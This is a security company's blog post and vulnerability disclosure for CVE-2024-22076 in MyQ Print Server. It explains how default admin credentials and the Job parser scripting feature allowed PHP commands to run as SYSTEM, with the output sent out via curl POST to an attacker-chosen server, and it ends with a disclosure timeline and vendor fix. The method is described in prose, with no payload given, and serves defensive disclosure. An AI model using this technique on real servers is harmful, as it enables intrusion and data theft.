Unmasking Web Vulnerabilities: A Tale of Default Admin Credentials and PHP Command Execution (CVE-2024-22076)

15 februari 2024

MyQ Print Server before 8.2 patch 43 allows Remote Code Execution.

Reporters/authors
Dylan Wesselink, Edwin Siebel

Introduction

In the ever-evolving landscape of cybersecurity, penetration testing remains a crucial tool for identifying and addressing vulnerabilities before malicious actors can exploit them. Recently, our team embarked on a penetration testing assessment that uncovered a vulnerability in the MyQ printer software, highlighting the importance of robust security practices. In this blog post, we’ll delve into the discovery of default admin credentials as the initial foothold, leading to the execution of PHP as the NT authority user.

The Prelude

Our journey began with a security assessment of a web application. The target organization had enlisted our expertise to conduct a thorough evaluation. As penetration testers, we knew that the first line of defense is often the weakest, and our hunch proved right.

Default Admin Credentials

Upon accessing the web application, our initial reconnaissance revealed a startling (but actually pretty common…) discovery – default admin credentials were still in use. This basic oversight, a classic blunder in the realm of cybersecurity, handed us a golden ticket to explore further. The unsuspecting web interface granted us access to administrative controls, setting the stage for a deeper dive into the software’s vulnerabilities.

Escalation of Privileges

With administrative access secured, our next objective was to escalate and uncover potential avenues for exploitation. The targeted web application, running on a Windows environment, provided an opportunity we couldn’t ignore. Leveraging our access, we identified a vulnerability that allowed us to execute PHP code as the NT authority user – a highly privileged account within the Windows operating system.

Executing PHP as NT Authority

The ability to execute PHP code as the NT authority user is a potent weapon in the hands of an attacker. NT authority, also known as SYSTEM, is the highest level of privilege on a Windows system, surpassing even administrator rights. This level of access grants unfettered control over the entire operating system, making it a coveted target for adversaries.

Exploiting this vulnerability, we were able to execute arbitrary PHP code with SYSTEM-level privileges. This meant we could manipulate files, access sensitive data, and potentially compromise the entire system over the Internet. The implications of such a breach are severe, underscoring the critical need for organizations to prioritize security and adopt best practices in credential management.

Conclusion

The web vulnerability we encountered serves as a stark reminder that even seemingly secure systems can harbor critical flaws. Default admin credentials, a seemingly benign oversight, opened the door to a cascade of potential exploits, culminating in the execution of PHP as the NT authority user.

The lessons learned from this penetration testing engagement are clear: organizations must remain vigilant in identifying and remedying vulnerabilities, especially in foundational elements like default credentials. Regular penetration testing, coupled with robust security protocols, is essential to fortifying digital defenses and thwarting the ever-evolving tactics of cyber adversaries.

As the cybersecurity landscape continues to evolve, it is imperative that organizations stay one step ahead, fortifying their digital fortresses to withstand the relentless onslaught of cyber threats. The journey towards a secure digital environment is ongoing, and it starts with acknowledging and addressing vulnerabilities head-on.

Note that the MyQ web application was publicly accessible from the Internet in this case, which makes this vulnerability that much severe.

Responsible Disclosure

It is worth to mention that the team behind the MyQ software has adequately handled this responsible disclosure. There was clear and transparent contact throughout the entire process.

Access42 disclosed the vulnerability to the vendor as follows:

Tested version: MyQ 8.2 (patch 29)

*It is currently unknown if newer or older versions are (still) vulnerable.*

Requirements

  • Valid user account with administrative privileges.
  • The setting Job parser must be enabled. Could be enabled with valid administrative credentials.

Steps to Reproduce
When all the above criteria are met, exploitation is possible.

Due to the implementation and execution of the Job parser, the response from the payload which is executed will not be shown in the interface. Therefor, the attack should be executed in a blind matter. The ‘system‘ command (https://www.php.net/manual/en/function.system.php) in PHP is best suited for our task. The function executes a system command and immediately displays the output.

Note: Other PHP system functions have not been tried, but could yield similar results.

The program curl is used in command lines or scripts to transfer data. The data attribute allows to send the output of the executed command as POST data to a server of choice.

This demonstrates that programs such as ‘whoami‘ can be executed, and the output can be accessed.

The output also proves that the execution of the command is done by the SYSTEM account, which is the highest privilege level in the Windows user model.

Remediation
Never call out to OS commands from application-layer code. Alongside, strong input validation must be performed, including whitelisting of permitted values.

Impact
The impact of a Remote Code Execution vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

Disclosure
Could the existence of this vulnerability be confirmed by MyQ? We understand that to either provide a formal response and/or patch the vulnerability, it costs time. Therefor, we would appreciate a reaction within 60 days, as we do have the intention to publicly disclose this vulnerability.

Timeline
[2023/11/23 02:41:59 PM CET] Disclosed the contact with the vendor.
[2023/11/23 04:40:00 PM CET] First response from the vendor.
[2023/12/12 08:13:40 PM CET] Confirmation for an upcoming patch.
[2024/01/05 10:57:38 AM CET] CVE-2024-22076 (https://nvd.nist.gov/vuln/detail/CVE-2024-22076) acknowledged
[2024/01/22] Patch released by vendor (https://docs.myq-solution.com/en/print-server/8.2/technical-changelog)
[2024/02/15 11:00:00 AM CET] Publicly disclosed the vulnerability

MyQs Solution
MyQ has implemented a setting to lock/unlock Queue’s Scripting (PHP) settings for changes, improves security by allowing to keep these settings in read-only mode at all times. This dimishes the vulnerability, however it also limits the intended functionality considerable.

By default this option is disabled.

See: https://docs.myq-solution.com/en/print-server/8.2/enable-modification-of-scripting

CVE-2024-22076